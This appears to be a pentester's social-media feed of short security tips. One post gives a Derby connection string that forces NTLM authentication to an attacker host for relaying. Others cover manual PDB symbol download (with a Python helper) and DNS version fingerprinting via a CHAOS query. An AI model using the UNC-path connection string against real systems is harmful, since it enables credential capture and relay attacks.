Infosec enthusiast, Pentester, Network Security, PCAP or didn't happen, Monkey Island addict. bka-sec.bsky.social, @_bka_ on birdland
Blog: https://blog.kanbach.org
Birdland: https://twitter.com/_bka_
Bluesky: bka-sec.bsky.social

If you ever find an Apache Derby service running on a Windows machine, try to connect to it by specifying a UNC path as database name and include your address for NTLM relaying.

Example connection string:

jdbc:derby://<target>:1527/\\attacker\foobar;create=false

Downloading symbols for .exe files is easy with tools like symchk, WinDbg, IDA or Ghidra. But how do you do it manually, for example on Linux with only a few tools available?

First we need the UUID of the PDB and its age. We could use objdump for this (screenshot).

The info we get from running this command (if the .exe was compiled with symbols) is all we need to construct the URL: the name of the PDB (in this example ipconfig.pdb), the UUID and the age:

wget https://msdl.microsoft.com/download/symbols/ipconfig.pdb/493b7871de08f6daa56f515cbf6c68b51/ipconfig.pdb

Please note that the last digit, 2, behind the UUID corresponds to the age value. That's it, the symbols are going to be downloaded.

#reverseengineering
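As an added example (not the post author's code), the following Python helper parses the CodeView "RSDS" record that objdump reads from a PE's debug directory and builds the symbol-server URL from the PDB name, GUID and age. The record bytes, GUID and path used here are constructed for the demo.

```python
import struct
import uuid

SYMBOL_SERVER = "https://msdl.microsoft.com/download/symbols"


def parse_rsds(record: bytes):
    """Parse a CodeView RSDS record as stored in the PE debug directory.

    Layout: b'RSDS' | GUID (16 bytes, mixed-endian as in Windows) |
            age (uint32 LE) | NUL-terminated PDB path.
    Returns (uuid.UUID, age, pdb_path).
    """
    if len(record) < 24 or record[:4] != b"RSDS":
        raise ValueError("not a CodeView RSDS record")
    # bytes_le tells uuid to undo the little-endian Data1/2/3 fields.
    guid = uuid.UUID(bytes_le=record[4:20])
    (age,) = struct.unpack_from("<I", record, 20)
    path = record[24:].split(b"\x00", 1)[0].decode("utf-8")
    return guid, age, path


def symbol_url(guid, age: int, pdb_path: str) -> str:
    """Build <server>/<pdb>/<GUID hex><age hex>/<pdb>, as the symbol server expects.

    GUID is 32 upper-case hex digits in canonical order, age is hex with no padding.
    Accepts the GUID either as uuid.UUID or as the dashed string objdump prints.
    """
    if isinstance(guid, str):
        guid = uuid.UUID(guid)
    # The record stores the build-time path; only the file name is used in the URL.
    pdb_name = pdb_path.replace("\\", "/").rsplit("/", 1)[-1]
    ident = f"{guid.hex.upper()}{age:X}"
    return f"{SYMBOL_SERVER}/{pdb_name}/{ident}/{pdb_name}"


def url_from_record(record: bytes) -> str:
    guid, age, path = parse_rsds(record)
    return symbol_url(guid, age, path)


# Constructed sample record (not from a real binary): GUID, age 2, build path.
SAMPLE_GUID = uuid.UUID("12345678-9abc-def0-1122-334455667788")
SAMPLE_RECORD = (
    b"RSDS" + SAMPLE_GUID.bytes_le + struct.pack("<I", 2) + b"C:\\build\\sample.pdb\x00"
)

if __name__ == "__main__":
    print(url_from_record(SAMPLE_RECORD))
```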

Some nameserver implementations could be fingerprinted by querying the server for RR TXT, Class CH (CHAOS) and name "version.bind". Could be done easily using dig:

dig @<nameserver> -t txt -c CH version.bind

#bugbounty #pentest #pentesting